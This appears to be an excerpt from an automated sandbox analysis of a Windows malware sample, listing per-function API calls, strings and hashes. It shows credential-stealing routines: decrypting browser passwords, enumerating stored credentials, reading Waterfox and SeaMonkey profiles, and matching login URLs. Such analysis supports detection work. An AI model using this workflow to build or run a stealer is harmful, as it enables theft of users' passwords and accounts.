                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 580435826-2783969131
                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                              Control-flow Graph
                                                              (rendered graph for function 004091B8 not recoverable in text; executed/not-executed edge listing omitted)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                              • String ID: bhv
                                                              • API String ID: 327780389-2689659898
                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2941347001-70141382
                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                              APIs
                                                              • memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • wcschr.MSVCRT ref: 0040C324
                                                              • wcschr.MSVCRT ref: 0040C344
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 1157525455-1702587658
                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                              • memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 3883404497-2982631422
                                                              • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT ref: 0040BCD6
                                                              • memcpy.MSVCRT ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 509814883-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile$??3@ErrorLast
                                                              • String ID: |A
                                                              • API String ID: 1407640353-1717621600
                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                              APIs
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 62308376-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • _wcsncoll.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                              • String ID:
                                                              • API String ID: 3191383707-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 3527940856-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 3527940856-2068335096
                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
